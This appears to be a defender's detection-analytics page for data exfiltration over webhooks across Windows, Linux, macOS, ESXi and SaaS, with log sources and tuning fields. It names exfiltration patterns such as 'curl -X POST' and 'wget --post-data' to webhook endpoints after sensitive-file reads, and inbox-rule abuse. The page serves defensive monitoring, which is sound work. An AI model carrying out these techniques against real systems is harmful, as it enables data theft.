Unusual processes (e.g., powershell.exe, wscript.exe, mshta.exe) posting data to webhook endpoints (Discord, Slack, webhook.site) using HTTP POST/PUT requests. Defender perspective: suspicious process lineage followed by outbound HTTPS traffic to webhook domains.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| File Access (DC0055) | WinEventLog:Security | EventCode=4663 |
| Field | Description |
|---|---|
| WebhookDomains | Domains to monitor such as discord.com/api/webhooks, slack.com/api, webhook.site. |
| UploadSizeThreshold | Threshold for abnormal data sent via webhook requests. |
| ApprovedApps | List of approved business apps using webhooks to reduce noise. |
Processes such as curl, wget, or custom scripts initiating POST requests to webhook endpoints with encoded or bulk data. Defender perspective: abnormal chaining of file compression or access followed by outbound data to webhook URLs.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | auditd:EXECVE | curl -X POST, wget --post-data |
| File Access (DC0055) | auditd:SYSCALL | read/open of sensitive files |
| Network Traffic Content (DC0085) | NSM:Flow | large HTTPS POST requests to webhook endpoints |
| Field | Description |
|---|---|
| AllowedTools | Expected command-line utilities allowed to interact with webhooks in enterprise environments. |
| TimeWindow | Expected timeframe for legitimate webhook traffic (e.g., CI/CD deployments). |
Unexpected apps or scripts (osascript, curl, Automator workflows) exfiltrating data via webhooks. Defender perspective: correlation of clipboard/file read operations followed by HTTPS POST traffic to webhook services.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | execution of osascript, curl, or unexpected automation |
| File Access (DC0055) | macos:unifiedlog | file read of sensitive directories |
| Network Traffic Flow (DC0078) | macos:unifiedlog | HTTPS POST to known webhook URLs |
| Field | Description |
|---|---|
| WebhookEndpoints | Webhook URLs monitored for exfiltration. |
| EntropyThreshold | High entropy payloads may indicate encoded/encrypted exfiltration. |
VMware services or management daemons generating HTTP POST requests to webhook endpoints, chained with unusual datastore or log access. Defender perspective: exfiltration from VM logs or disk images over webhook URLs.
| Data Component | Name | Channel |
|---|---|---|
| File Access (DC0055) | esxi:hostd | datastore file access |
| Network Traffic Content (DC0085) | esxi:vmkernel | HTTPS POST connections to webhook endpoints |
| Field | Description |
|---|---|
| DatastoreExfilThreshold | Minimum data volume to flag exfiltration attempts from VM files. |
| ApprovedIntegrations | Whitelisted CI/CD or automation webhooks tied to vSphere/ESXi. |
Suspicious SaaS tenant activity involving webhook configurations pointing to external or untrusted domains. Defender perspective: repeated automated exports or suspicious webhook endpoint registrations.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | m365:unified | Set-Mailbox, Add-InboxRule, RegisterWebhook |
| Network Traffic Flow (DC0078) | saas:api | Webhook registrations or repeated POST activity |
| Field | Description |
|---|---|
| WebhookRegistrations | Monitor new webhook creation events in SaaS environments. |
| ExternalDomains | Flag webhooks pointing to domains not owned by the enterprise. |